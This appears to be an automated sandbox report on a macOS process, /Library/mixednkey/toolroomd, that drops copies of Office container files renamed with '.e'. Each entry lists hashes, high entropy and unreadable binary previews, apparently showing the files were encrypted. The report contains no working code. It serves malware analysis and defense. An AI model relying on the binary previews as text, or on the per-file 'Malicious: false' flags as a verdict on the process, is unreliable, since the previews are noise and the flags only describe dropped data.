/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Corsiva HebrewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1842
Entropy (8bit):	7.61318224284379
Encrypted:	false
SSDEEP:	48:EMFv+eAYK+Vo/xMx9S5vPUJW2/XVl29avuRNWfGBNpq:LvwY5oJMx+UJW2/lotzu
MD5:	D37E8E60BAF26AC160526929F3E1B72E
SHA1:	9E3C079857A509BACD88B6B58258824A005077E1
SHA-256:	B81A4DDC4534311A37ACC94C38DA76530ED0AC18324085EBD9D5A3F8F5AC717C
SHA-512:	8668197622C71BAE9F38C30DBA740C107B1532B7D556737A9331569AC6A5145A5F01FE508B43B430F972088BCCE315E8F782995F474FDA0C730EA0C0CB3A625E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...\....W........V..f.L.?[..W..]i./r....k.C....=..c,_.. .A..\|_",..P.a..$-v...w...l...9.....F.`..X................$....1.C..s..A3&..j<F...K....X.H....F..x....Y./....S:%.D5.....E...'.......HA..B.?._.2xhN....Z[BCg...@.UZ..e.]H.....X.n..a.@....f9......I....e....^..QG..../!.Zj..7l..k8.[..'Z.[^......m.Y.....m.@.Y0..JS7zB./{.zvI"(L#....&g...)@.x..BNGL.O....Ewe.L......J.......a.A.3.....!..;6"T...Z.....9...LS..X..:...x..7.V.....<........+s..eW..YH..S ../.5....<..&X.....1.}..d~.+e.[....Ma..h.hrI..y...9J..}..S..d~....]reRT..Q.....X..}...U..b/.(..k..#!..6...........y.L..z..B.Z1.M.....]a...T..X..~....BK....:+h?...m).~x...b.....-.(jt6..."1.z%W....,R8..@_.(..w.........,.Q.....!.#L..0.....D..... ..:.........$.f..-.V...1....-.w....m...h....qP^F..Tc.R..C..l...bW..2.6_.....m..V.%.k.......a..[...%\|..~j...L..\.....p....].).zS....[...<..j.0x...KNX...;u..u.P.w.......O..d.E..g#..z.....vv..b..Z

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Courier NewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1554
Entropy (8bit):	7.518976356962077
Encrypted:	false
SSDEEP:	24:EC63n1oN09ieIUIKP2/4KAG060/5IfYSOvto3vvCF2LukRZxYPAes3T+4BL4cse4:ECe1oCxIUxm4KA9gYYfvWw8MfL3Npq
MD5:	F57F0271B8F88AC6619E6B3B792B5AD8
SHA1:	214AC2AD3D574C21E5614893CC7F0404216D1CE6
SHA-256:	FFF9610FC30C12EBA0F83E2656C72F7AA5C9B38F4E79522CD7D7AA9ED89315B4
SHA-512:	72C445B9BAC1EFA857E2F60FA5A78B35331EA35BDAA4E38E81AF6812DCB09E9954A3F718616596C6BE71D2F80F967A52DC1537D1CD15BE58E06C667DC057E206
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...-.0eo..l.wZz..2jt^..I$....I.Xy....}..^4RU....FZ"W.Q.....b.h..v....8.j....\.../".......0s........jh.ie...q.}...nl.\|R..v....s..@2.7.j`.l{:..E...{d....(.2aj..mId.Q.O../...KO7..C.Y...F`>...H...B.zY.Je..y.?...+..........=.F..).~..... DzJx.n...}.^6c..3$...... ...B.Y-.D..g....B..2u..'.,........(1% o0...Y..cGxC......6-..T........VnDB:o...O..{8FWe....L...}F...2.b...D...Y..'..m...f...=..p.E..;.)}a.(....D<.->x)....9...2..I..7..&2..C..x......<.8.Wn.....h.ZV.k..b.<.`.......bm....J..:..o._A..... \|\|.F.^....H..x.dbb..V..R...VyU/C...(x...&.j.....$.....k..G..3...9.D..o:Qd.M..y.Z...#.4.G../..3....g...\|dPW...y.....4...}.^..t.y....<.q..\|.y...!mN......E.....@6-..6..:...+..2bQ....5.b..8{`...........F#p.?....hI..._NU8.6...@..3..^.........F.e....SCeFc+.....KyP....'...:...n.....(...V.yf.:.(`HE..9..I.A..1.]p..aqn..o.,..G..:.i.=..)#...o..).\a2..k~.gQ}+..2..../.S.1.l..g.-...>&!.Ku].3.\*.l...^#.M%...e.....FD.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CourierRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.489909000603841
Encrypted:	false
SSDEEP:	24:EyeC6fbVry1O+ZMLFRuRk0YVzJv+DchlofcgulROj6kyT5QYsePc0m7:ETCkbByc+ZonuRCzJ2cIc3ROo57Npq
MD5:	33542063EE30BB17B1458B972B071EC9
SHA1:	FB4C37F04D1D10A34D2629986BF3354226EDDB36
SHA-256:	7C47B44B387BE4BE60D1BF356F7B7B54C279C2601666FE137D7750D23D5AE678
SHA-512:	1B9926D7BF5B975EAAD5A8EC60131F671436B5FDB146ABEC3709664F05F457C00347EC107BD7DE03F2286F4F65B92F5CBEBFB84BAE87AB90D0E4BC1C88153BF2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS......-.&re....p.....@..b!z...b....<.......J..J8.......`.......p......S.5K..U..=.Q.n..6..S...l..gP.!B....=....zHcX.).#w.Y..=<.:..S.h.C....Y..1......s..;...N.,........{.3..-..}.ANp..... ....?_....p!+.1..#..e.j..!.\..n....Wgw..L....vqt...gcXW.....A....y..9.!...u_U....o."..5K.........{.N_......4<.2.:n@.....g.J.Y..V.........4..&$xMp...s&.....8M.i..nH7IM.D)..^..Uo"J.q.2..?.Af...#....f^T.K\|...S6.A..X.(.....TD.x3..RF3.,..Q..%.$;Su^....2..l....<V6.......0.99w.).E?j[..y.kq.[....A...}..="..xs.4q...(..[..{.......<$.C....0.s.7.....6...i../av[!u.`..?.f...k...r[MA.4.Fb.o`..1.r.t\|.c.r/.lI..zw..^Y......#...G..0p..3.G...L...).....(.Zp.Yp....Q.1..IM./)..i...2.DA?....`..Dx.q..yA..K..w..f_..J;....WeN.L%.~7..\.2.[.C........."h.\.d....1*.....5.e!..f.%[[..2W`.]w..(.v..N;.e... ..>"B#}VR..N.7#...G.~?..._B..YR...F.S...O(......c........<.f.......~.ZX.K............J4....g.v...'.....d....D.n...

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Curlz MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.404333244557378
Encrypted:	false
SSDEEP:	24:EGQLYVydhjgOjweB+b5cDfz/yBM4wOO3FGhcf9AbUhBGh3aaJbbt8h+m5Sz3sePw:EJEsBgVQfbyBOFP9iULw3aobh84m543u
MD5:	DCDF6F42DDDF910154F6095AD9FF2A58
SHA1:	CD0C7847E02D38BB65584FE9B532D2BC827916A2
SHA-256:	35E4655FDC40FCC9A25EBFD39A117FF4E89B4F3FF6BA1050C7C3E384B48CAFF1
SHA-512:	AA327D826F8DA18B0D38C259DE2D1694D15E9F25E7E8A5BD2FB0573F1D379C0B3866DB1794BDF4756E690B9DFAD08E50D4F56366E984FB9BE2478580B6D09FEB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G_....\..:..1Q........q2..Z.m.<l.....~.."...}....Rm.`....}K..`.'...B..48..D.b..x...G.l.4l.Q./g.>y...,..C.....i.6\|.8.Q'\|aU.. ....?\.....n.v...4;...f [[.#._.b....BO.........C.....j........W.-.......o....U..J..B..y..~.!.E.:.>....Xy8..))..H..%b..a..1..%.....A.Wj.........".b.Y92...1...il.K<K.- I.,.L.k....U......q&N.-~6Ru...Oj..D@....ywh..!.<....0...I.X06.....}.?..9C.n.......0.g........[....wi$..xL.E.m...<..`..[....Y.....c.4..@..p.....U.......z.X[.-..Z.....K....."...(.E.Y.....Dj!$]..gF.....6.i....\|.0.@..........RB.mH......i..O...^.....\|.T..>...w..:.(.e...Z..%.`..>j......\..VU.&l......!....N./..~...(.M.B...H.v...E.....P.}....7.H.Y..U^ .S4.SA).-o#N.}_..^G.3......k......?).....O..QK..!pV.._.z.....c,\.....z....L..&..x2..........q....2.d.".....>?...v_Y...KG:...h..-...Z.*r$...$...ict...N.b/.w.G.Z..!.v.[.Rx.Q(.s.u.).(..T.HT.<...,?j....Y..S..Q.D..:.1H2N...V.js..&#..ys..F.......'

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DamascusRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.425698710187385
Encrypted:	false
SSDEEP:	24:EXg9fNICp6wPzKwxHnulwhCFPGyVdRRdRHTU5QImByz7XGsePc0m7:Ew9xB2sHnu60FPGSrRdyhXGNpq
MD5:	BF384789875CE06B7F78957C09A557A0
SHA1:	8FE92AA74125A99A58EA3D0E21A6E9BBAD9A1EDD
SHA-256:	85DD71DF3B25DEFE8387B710ADA83AB7ACA96B95DC9B4EDA880A640DDF596FFE
SHA-512:	5F5FDCC7D53F0CF02D0C434B12E41025AAA96ABAF53ADB15BB1BDA04A239A270879E927C1BF62ACBA6DC025A814B68B5C77C73C5F1BACCE0A0760A446BA5876B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.az%..W_:../.w..q...... ......#Y.U......`>D....tw1.....:.@nEJwX..gm......@......j..I..).ld..4.s........T.h.....Vf....)...Hz1M......J.W@.'X_../...]....w.q..E..ET......=w.G.l...TK.Z...Z....u9./.?.W.. ...Z.a..H.G....5 ..R....zi....AVK..aL..C.!..c.9....h...aX.T..<#1...H5..v.g.Tg.K..2..A...B&/...T.xOEoT..i..k3..]..5..W...f.T......8!)2rm\...C3[.A.\.....M=...J...S+...d..@..y..6.......U...T.....PX...fV$Z......bx....&>..[....[.wv.r!.,...T.78$O..U....s...;.E.x.BY.ie.y=h...Y.....B.#....\&..n...Em..N.....<.[..I...(~......$..O(...n?.r._....j-...Z..&.o..7..{.B`.3...ftA.W.(...L.cq..L..P..X.......mw.v.....7$u.d.......O.b.......-(.E9+.}"[7.7..M.^....'"....Kb9.c.V.y.)./....=d..w.........=..V.....1}R*....6.~s.X..W3.(..,C.-..,.{..y...Z.......?.U...7.I....(....8.[....Bm..%.}.....C.Iin<.>...x...k......vN....5N..LG...].......=u....9-t.9..q...l~e...q...39Z.H.....D...R\|fs..SM.Q&..n.}#->%.zR...X..NKe/..@e._R.}..R.^w.)...Hz

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DavidRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1066
Entropy (8bit):	7.254784795677156
Encrypted:	false
SSDEEP:	24:EkuLGE8AVNRFa/rM38RRycxEUOeya3jdXcYsePc0m7:Ek+dhFazM3q88l+4hXcYNpq
MD5:	5E780413A5B73CE53307039198B9ECC8
SHA1:	9BE4328A54F4A3A3B67BFE67D838212C1C28B848
SHA-256:	C87BB6E71A15E72695110B2643D430DF3E041B653802F44BC84B8EECFB1D5AC2
SHA-512:	237E6F9D9A6B9A85A1FAAF3BF401EB73ABAA7B17C9761101502A0F7282E1B87E3E13BDEFB57CEB85E1409C709B0A4C4731079BD7BA5358CFB599C4A81A316945
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.\|.z+f...H.._..A.....+uz..G.....C+.s^.@.%..q.`t......W.......3].H@[.1.........Q........fAF...Q.w.9.?%o.?LY..IW11P.,..-.23......c.[...3..?...gn.k]U...}..w5...S{.>...Y.&~...\|l...i2N=3w.....#.....\.j.n.Z.N..k..2]5....xW.........nX...P@.Y?..w<..zU..y.!6\|...'K...n..=....}.>.%qG.b.\nJE,...C....I.ga.yiS./......4Q..e..J1..+..f}.QV....r..........,..........ZI.......g.#\<#..87k..`.'L...Nb..Lka......3.....\....Er......X.`.#_3W.!./I..\p.......-h..Q..D@Y.U..o...........e.....Cb..8"D...`.y`t.IW...S<8..Y.\|-....].De.......a...`.........=.;..T.q.....r.EN.,J.[[.e.\|w,'..o.f.s.q:@.7W..8~H.t..ES.f......X.!..m.w.D.O..v.t-....pj0..g...^A........RD......k.....9.]M....g{0.....b.,.8...(-..o.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DecoType NaskhRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1978
Entropy (8bit):	7.653216895905171
Encrypted:	false
SSDEEP:	48:C3hHos8wRhs4E7/qK6p1iSE27no0fxyi0Uz2TH3NKztCPJNpq:Cxzh87/qK6fnE+o0fxAT9Kztmu
MD5:	47C4D993F38ABAD398C47A4D60EA0AB5
SHA1:	9ED164937EBD71AA80A556719C9FDF17718505D5
SHA-256:	E63303F0954EEF1DEDB017FE71CA6E1F8FC848FA91823458F659D14AABB28B62
SHA-512:	57C7B3AFDCECC928F285BEEB54637F99F57FF0DB9F0639DDB1EB02C9B7B9433F86B337B0040617F60060DA2FFB0D2EEA64093406663E6346B5652D2BF46A06B2
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.aB&....W..."x3...1.&.?9......%.....e.MC...10GA)...."={Y.[..r.....TP..a.j...$......A.U.b@....~!...."..]B...........8...5.l....:.=y...........9=..&..IE.....Z..X.Z.#.\...9....W/..GaL1p.j:....h...[e.a.R.+.R.S..9.7..7.)....W..`......X.......n..>....[.nY.p........}S.......'.0.4f....>..$.....`Dr....r...g'...vD!..@..._.4...QI..O.....RQ1..^....I[X....Q.W..f3r..V......yw....x\|k.....T.}.Y....BYj..X.."E.C]V63...-Xc..... .I..$....@.+..\.k/.8fe.d,->.y9.Q.n..:...L.....T.O..8'...D.eJe~?O.....l!8....i....s0.7m.l3.5...\|.J........<WwFMe..6u.X.C(.L..}.z....Iz....f..#.;!U.6g.x.B..N.W.[..N=.Z.-.C...1..t8h.....s..%.v.....'8..@..]..m.L.A..azjY.H.A..:.L.H..N..b...)`_...Q../...G.......R..#...J.;...Y...;!...U.p...n.UWD.yG.ZN7.w.N..URp....Lsj......l9_3.......fG..8Z.:8..Dz...E......4`...SB!.S...~.]...H..^s./.w.....R...+^..d.....[.h!...2.eNSNuW.0._D[W.C^.SME...~.;n..2..i...f....od.},.XF.sC9t..\..&{..j$..2P.5..^D

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DengXianRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.432137258979787
Encrypted:	false
SSDEEP:	24:EpXPXOmUOUQz22q/EzO/AyF7bV6MBjnV0cbopeqSsZWGsePc0m7:EpXvOmUOU4Fq/EzO/XhVLopeeNNpq
MD5:	59DEEFF785A0C650A6D2F946BCEBE018
SHA1:	6C227FB2261F95A504F17053A7622FC741466DA7
SHA-256:	6ECB46815B2049B5659DA04D00D57B8BB1653DCBE7E5AC0886415B9059CD4422
SHA-512:	10E40F1BF389454AE382BF32FA29BBC6525056E9EE509839DACBEFDC69E89770CA86834B0925ABDF553C710E2B3100DC7BAEBACF97D374DDD20FC38418B55FCB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3.%..G.l+'T....h5....~E.@..(..U......'1T.ZR..A..~....3..m.`.,............i..4.!`..k.A.>57..w...}.\|K%.b'..$.".u.9).d:~o..O_..Y8j^v..r.{...V......z.t.1D.......Db-...#.......6..5........RC&N...^..3{......U..R.&.\|,..H..N..d.9....I..T.^..:......b.-w\|Vr....p.R&..{.gy.4.u....E..&.uz3..m... ...)Q4.c......F%....).q.....l(. ........<O.p...?i.....p....J.$...2.1+oxK..i.....N.\|`UC....l...f...r ..o....../2...W..L..}J.G.n..$!zZy=6. .X=.....k.<.....06E.V.F.2.../K..s..H..1...@..U.).G.L.-....X...w.N3J...h.?..p/.. ...;....2...TF@kW..:..O.l8&.........+w.2.#.A...K.=.O6...";....i....s...A... ..-..0sI.H@.X..1^Q.G..A0F..t........"...a.......:E.....n.D..'...}1..{..cshyEBb.!.p4.M....1.Q.....F4..B.>..l.P./....1E:.. .P.D.....c...\|=......w..`.a.o..B..?X..A......e.)....7s.`...^......-.+...)qg.....Hb.Sz.*C..2.....k'IG.n..t..L}"b......:[r.s.wp...y...e;..S..J..s...3.;8...%.G.A..p[./...o.4..}..x..c.+e8\l.i..#..4,...Y.../.1

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DesdemonaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1402
Entropy (8bit):	7.449304099959295
Encrypted:	false
SSDEEP:	24:EmDddQLiYba3HQ8voJHtwu7UeldrXguooQGBToz8oJIPysePc0m7:EmDMLiga3Lorbgh/GBTolyyNpq
MD5:	F9F5FF607DA7B61B1080B141E5C11E8A
SHA1:	E264E59F7D1CAE6224067F2298557B26E10C9EE9
SHA-256:	0B3C6406AB66923164BA983388BAA9FBB736FCD14B93CD1285A664D03EC5156A
SHA-512:	65E494F4B5B7242BF8E58705F80326E3EB011876C5A06656EAA361D1ABF4919F112AF3FA14D17885FDAB3AFE2D855F52A93F22817194931402CE3F57DA2597F6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.<v.x..e7..!..".h./.#.&X...N1Fn.&.8..9_.\|...........h.z...q.{\.&u.M...mi..\...Xm.k."...K........7-s. \|fl...}...t...2.s...n..T......:W(....y...:....P...u.. ..../.g.u...j..S.....}5y..%..w.6.^.%}.8q..q..e....@..=....fb.LO......\^...v...J).{.P...<....]...KJ...v..eWr....Z.......)S....G&..,7.c.3Hf.c..5,.P.).".....`3k....Y.....e:..HT.>...Nx..U.l.C.... .F.7Z........I...T.vX8T.m.%".(.$.F.W......83Y.W..y.:..I.....V..x..$.......R/.....&.zx.G.!...M.".Po.+...l}..F/^}.....x..B-C.../&..R..Fk.C.8.F.<..{.L.(..#..\|B-0(7..d..<.....C.,.2...[.)AZ.D-.4"z....4...C... !.'.:...=8vc.3!.}...8...p2..NhZ..!b...........w....Q5......E....c`0.C;...5..i#;F80.......)..[.$!.-u_.].=.B..;~...Q.K...~....f....^N.f.X.@^....-.K.F.&..:x..3......i>._..]!.;*;O..f...%...J.T.S...?S.....2BQ..Y..6v...Pj..[<..3m.#`...oeF..z..xo.]..>5...7R.?. ....I.4......6.....\.5.XP.k..<z...R.Ktz.\|..p.I....k....nQ6..8.+1..R^[ER.).........#q....2

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Devanagari MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	7.571638866683624
Encrypted:	false
SSDEEP:	48:3V9RRjRHnepNg9TwsAuGRhL/ApVIVW49KkZ8lcXNpq:3V9RRRHep+ws30hTAJs8mu
MD5:	477BF067AD9905CA83EEAC66A3964A04
SHA1:	4DF9AB1C5E21F2FD27806BFFECB024CC7FFF0C45
SHA-256:	2ED10321E4F7DDE879B8ACF085E64385A72B3FC339319A2938452423F7F6E712
SHA-512:	B76D4D3880E3D44C2CB789F18BA0A67E6012838435C64678AF6E7C46A9A9AF25FAB4C53DE531CE94A5AE6109936859A03434F4B106F3285AD201D336216C9F20
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a..a+..I..kz.&.%..z.+.?y.i..,....B..@.k...."...W.4...1..b.r......Ws.3..>#>z......\|..K......xR2-&..O........5.......qP.#..........i.6\|.8.Q'\|aU..%.7=........r......)....\......C.u=C....5+.76.(.s.h....pGN.w..}Z.X^....J&XNL...3]S.<6..~s....../M..:L.Nw.:....2............4K....K............o..~...L..KH}p...!...H4../.].%%.`U.7.yr...T..JJ-B.."..."....V.R3U......XE.tCh.=......*..m9......^.9I.....<.....O......].)...1...je....A:7. ....b.>7G....h...D./@.............y.8O...r.^.%.z}..BvU.Mbp:.....l;2...]...E.I/..c...D.TN...S.m....\..[....4.N...,B..R.[X._.aL...1\...k..`x......$..n.vP.....ce.G.5'.n.?.u&7.W.]..w.Z...(.....;.Q.....KF...'6.....c.....^B..RA.....g.E'...G..H0...e..K..!....>.S0.k.W....Fl7..s.o7...q......AT..e.G+M.rk.M ....R..........I....].W2!.}mx..4a.c..>...iU-.c8.oG..OI.e$<..i.rI..4.w...x.5...a....^4..]..z...abl......}~.Z.`.)....O..n.;...b.....V=....V...6.rsK3.....=...<S&O-..A..3...#.]6...<...m

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Devanagari Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2002
Entropy (8bit):	7.673018462998995
Encrypted:	false
SSDEEP:	48:ETK24Q9kRBqf009+akjXYaUI3PewK1TNpq:KV9d009FQYaUqpK1Tu
MD5:	108F0FA4B31FA6D191046F88E69ACAE7
SHA1:	55DE9D986C9222846B1C7A8BD06D191D899AB456
SHA-256:	917070D3DAC63DC390821B82B3A1438A762D8648D060D240EA5C253175782ED0
SHA-512:	8BEA1F4A278CFD4A0459FAE38D82B9CEB5F7B916748E2401D39893FF8496863A359A7C619E965555B45D19245D648265F1E762CCBD522F2EFFCE06101A3D59CD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a8l\|.5....@...".Y-V....\|........4A...&....5^...}.)..U...uv.J$...x1-!..U.N8.M...._..u1N...`d......;..1[.!_... .Cp._....Cp._....Cp._..."..4.U....A;..l.....=..D.h.......m....j....._.8k...:2.}....Y.E..#%_......j.~li.Z.K....1V.\|W.....7w...%BX.=.c.X....'.=\|..Ga9.MN..w~....hw.J:.....9..G..R.Y.Y]l....C.9.D.L......\|8C.YD..C>.6.?..'...x,..6E..oL.Csc....%H..0.gZ..i. U.v.*.S.<..$....}\.X,?s.x........^...F/.....U.CW...i........;........eK/....../..#=....VN....d..H)A.@..@.Xi._D........Al....T......w..4!'.T.._....`...r..!.).J..P...6..F.......z.-%5..7.I....Y..W.p....w.fY4........(.y..x.>.P)...F8.=.`..%Fa..!E;O....~V..x..f.c.`..(.)......)A..........".s.Z....b&.r\|....oq..z..ff%.B..oZ..)[........nG.Ss...,..R......$.Y.r.]E'.P`.0..S..FQ.mL<.Q.sG.....>=.u..@.@......O.4.I[!...avZ`....i...^....R....<..wN...Ew....7...3;.....p.....\|%.%\......^....F..g.K.2..v%0...N....#..}oA7\.......eQ...t>.o......@.9.....j=...y.p..gy"

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Powerpoint.ctrlstrcache.en.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	20499
Entropy (8bit):	7.97378661851034
Encrypted:	false
SSDEEP:	384:TtGU3YTi8AKlnJvl7d0yQRwuFiqg7nChG7hRbx6pgItTp1uK1WQTYf9:TtGUtvmJNd0G7nCM7hniTGK1WQTYf9
MD5:	1017F53F81B4E396C942F71B73AC44A4
SHA1:	4B1D2B2B5803C4E45D877B755B684AA89721C585
SHA-256:	0727511A10DFC9C8050B5517B73FC94ACEE0E21BFCB3F5EF753FBFBD66AB30DA
SHA-512:	B405A3E74EAA8A03D344ABF2E738F6669BA5CCFDA9DE1B8B0F6B9565948027B49AEC709A56E0787CE6E83DFA89287D39B0993A23F4B9120F7B357DC872BE1A10
Malicious:	false
Preview:	...a>k....o.6.1].M.b...i.!..%.#.hMAj......@U..W.!$.5...Z....F..?...wq0.5....S.pP@.3..286.0..=...~<l..L.....!.Hp.[.Ee.......v..(K.ZvK.Hr$...xr...0.Q...^.-..{EwW.6..H+..g..=....M..X+2 X..D.....,.Ohp7.M.d.+O...UC......&.\.z......Q.s...]......C..9`.O..O.m.p....b"..T.Ey...2...MlJ.\|...W...f...h.J.l....p.V>..5C..Jz..U.}K;b..w^X\|..vH..RU....(...........,.k%...dJRhpZ....uh.+a",&>....5=./)....J.0..n_6......p....}.......^Xb.T..m...G..g..;on;..T\|.^.....r.7.0.........c..}.b...u.!...J..X[.Q.?..)s4..g..p..U.M.K!..u...K..fr.....<.d.w/..Cmg:......t...g$.CfV.U..y.X..2...=v4/.Ir{%...~?.^.+p...\|W=..\..........1...L..&..&.>.\..K.......\|Z.^....&i9.#..dK.:R..6<_.._pb..0.......r.s..8V.o.ql..........(..o..T.....B....r......g...R..H..Z.^......,..0.g........5.N.!.0Z..k....B....Q._....(.J.Z65...H?xY......[A...H...S33Hx.c.#.d7o..P.`.)...e.V..ze.e....1H...M%..o...9p.'..l.tR.?.....h....m8....D.5_....p....y...?..*z.z.'.V...a.HL....... L).v.H...Cb.w'd....f..^5...=..<

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Preferences/.com.microsoft.Powerpoint.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.413470841788883
Encrypted:	false
SSDEEP:	24:UKy+/a9zlzBK1rMrXgivT7Rg7gUEZdLZP7OsePc0m7:+9zO1IrwirZUEjLZONpq
MD5:	66E3EE25B2D578D5BAD72CEC60DC9DC6
SHA1:	3E2EA1E07763F00AF7AF6E3A2D4A0654755667F2
SHA-256:	F397CE0EDE0F696825D3B17FF0C37805D5C06AEC45B282EF2AC14F7344010DA8
SHA-512:	BB58DE948E547D9E430A92B7EAFC109111E368B98A17481710AEE346E3500FD245C2B5A762BEF9C002AE673CDFB581C5218BC17B9E861DF2841AD6074DB418A5
Malicious:	false
Preview:	...a>k....\|..G5..G..F.sk.`dQ.G4BQ.#8.o....i}@.$XK\w}.s9.ht.%S...[.....W.....C.> .@..8.c....iYr.R$/.)Y%.i/..yO..<....K....0)ZT.9xx...Fs,..k..V.{Hq...7[a]w.i...$_Lx.).a..........2..0..i...xO^......_s.k.6.Q..{.>\|...-...A....#.b.....xw.<Z...........o.=.L?...]$..:.i..,.A..y.4.._QX.@AFh...5lZ....V ...}.T.h...z.i.fT..."...b0.%.u.....K...Q.....\..S....q...]/.....lS.!:.'vh..sIY.h....=.1h.,.....R..yf..TuH.~-k.`b.q(...5iY.v....l.N..{.+0..6....E..V.o....AG....a".c.....q..T&.QR..0F........$.5.......j..D...'=..=.".T...c.....lr....@......zM...!.8.x....._..d.f...S5.Pd.8...ub..O...!&...A.f...l..?C.=wn....u.6...d3vd..f.72.+.8._..c..ca.p.....-....4I..[R...?.=......`..=iC.=.....2..3....l._m......d.....4..q...5.`.[..:.nbp.JI@<Lk..G.u.m.8M#.......k).........B.ge.....#$_\.XLSP......P~.......I..n.....I..t.-.lf{.b.7...gK..hJ....Cm.lv..GA[z..5..CZ.J...Mm.....7.....q..5.a. .8.E...4.{..$F...P.....)..!.<.4^.....U~....Q..gU<..Y^.{'o........hc\|\...MqO..... .. iv....6<.."a..

/Users/berri/Library/Containers/com.microsoft.Word/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	41468
Entropy (8bit):	7.969988950574764
Encrypted:	false
SSDEEP:	768:L49C/jgGGvQhSuYu6u8m9rdz1OiRxfaEWMe6pld1eLhgvyYAfAcG:L3HGHuT6u8mTzECbXdgLhgvCfFG
MD5:	2E8A993E10783D1F4FD0150373CA9D71
SHA1:	F0E8B14D4EB76B249973FE9BD9D4989C7A586569
SHA-256:	CF80028391C5189953AA3BA323C679851F1BF02D86980772BD987CF87860A973
SHA-512:	AC754EA72BB136273E3AB7B22C9052E738CF17128A181B4054A7793C1B2529F09C50900B1D9DA9AAE232D5E91759D9EFB63F9A8D42BC971A2250B142C474ADD5
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}.....V....[;R.....zs..O.FZ...j.H`z"?.#p"g....a.d..!`......'..3Sp.n~.c..W..d.FZ...+z+"..v.g.g..].uL\|..E.}G+.Id.......y}...<.).....F..\|...{.."..i".+......O.FZ...K.k.DT..l...m.`..H.;.MM......+...2j+.{.6..mt....m7.n.1..}....I.F>{s.(.?....q..b...K.k.DT..K.k.DT..X.../.g..].uL..:...O.\;G....E.......)\|(.........R....4_.fK..)...`.......h..;....M.G\.......p...,.%..0..vh"..S.....6c4?....vQ....[.DR;..G,d.Q.x^i{>>..>5.'..H96;E-jsQ.L=B.h8...o~7sI.&f..P...a..c.E.55.E..q.[@....tQ.......,.......^..........Y.@.0jrI.u9..N.........#..n..G...X.b.....C.c...5...t.........+0..g~..}.2........N.~...a.-.T.M....nE...U<j#.v....M@.9<lyv....]m.....e.ps.T.M.....4.$.h......@@1.....I..{..A..?..F]\|.%>...4}.~[cg.....8.7...}.h..&O..Z..O.C0.Wq\|..\|...5...-.Wrg..A_V...-H.T...9v&.vs.&2....}../.........